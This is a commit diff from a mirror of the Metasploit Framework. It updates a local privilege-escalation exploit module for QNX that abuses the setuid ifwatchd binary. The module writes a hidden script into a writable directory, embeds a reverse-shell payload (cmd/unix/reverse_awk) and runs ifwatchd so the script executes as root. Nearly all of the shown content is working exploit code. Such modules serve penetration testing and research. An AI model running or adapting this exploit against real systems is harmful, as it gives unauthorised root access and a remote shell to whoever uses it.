infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #9745, Update QNX iwatchd to use newer APIs

GSoC/Meterpreter_Web_Console
Brent Cook 2018-10-06 05:06:42 -04:00
parent c9ebe5ae23 89b6aafd85
commit 3d507250b0
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
1 changed files with 16 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
modules/exploits/qnx/local/ifwatchd_priv_esc.rb
View File

@ -6,6 +6,7 @@
class MetasploitModule < Msf::Exploit::Local class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Post::Linux::Priv
include Msf::Post::File include Msf::Post::File
include Msf::Exploit::FileDropper include Msf::Exploit::FileDropper
@ -61,15 +62,19 @@ class MetasploitModule < Msf::Exploit::Local
'PAYLOAD' => 'cmd/unix/reverse_awk' 'PAYLOAD' => 'cmd/unix/reverse_awk'
} }
)) ))
register_options([ register_advanced_options [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]) ]
end end
def ifwatchd_path def ifwatchd_path
'/sbin/ifwatchd' '/sbin/ifwatchd'
end end
def base_dir
datastore['WritableDir']
end
def check def check
unless setuid? ifwatchd_path unless setuid? ifwatchd_path
vprint_error "#{ifwatchd_path} is not setuid" vprint_error "#{ifwatchd_path} is not setuid"
@ -80,25 +85,20 @@ class MetasploitModule < Msf::Exploit::Local
CheckCode::Detected CheckCode::Detected
end end
def base_dir
datastore['WritableDir']
end
def is_root?
id = cmd_exec 'id'
(id.include?('uid=0') && id.include?('root'))
end
def exploit def exploit
unless check == CheckCode::Detected
fail_with Failure::NotVulnerable, 'Target not vulnerable'
end
if is_root? if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges' fail_with Failure::BadConfig, 'Session already has root privileges'
end end
unless check == CheckCode::Detected unless writable? base_dir
fail_with Failure::NotVulnerable, 'Target is not vulnerable' fail_with Failure::BadConfig, "#{base_dir} is not writable"
end end
script_path = "#{base_dir}/.#{rand_text_alphanumeric rand(10..15)}" script_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
print_status 'Writing interface arrival event script...' print_status 'Writing interface arrival event script...'
cmd_exec "echo '#!/bin/sh' > #{script_path}" cmd_exec "echo '#!/bin/sh' > #{script_path}"
@ -107,15 +107,12 @@ class MetasploitModule < Msf::Exploit::Local
exp = payload.encoded.gsub('"', '\"').gsub('$', '\$') exp = payload.encoded.gsub('"', '\"').gsub('$', '\$')
cmd_exec "echo \"#{exp}\" >> #{script_path}" cmd_exec "echo \"#{exp}\" >> #{script_path}"
cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}" cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}"
register_file_for_cleanup script_path
cmd_exec "chmod +x '#{script_path}'" cmd_exec "chmod +x '#{script_path}'"
print_status "Executing #{ifwatchd_path}..." print_status "Executing #{ifwatchd_path}..."
interface = 'lo0' interface = 'lo0'
cmd_exec "#{ifwatchd_path} -A '#{script_path}' -v #{interface} >/dev/null & echo " cmd_exec "#{ifwatchd_path} -A '#{script_path}' -v #{interface} >/dev/null & echo "
Rex.sleep 5
cmd_exec "rm -f '#{script_path}'"
end end
end end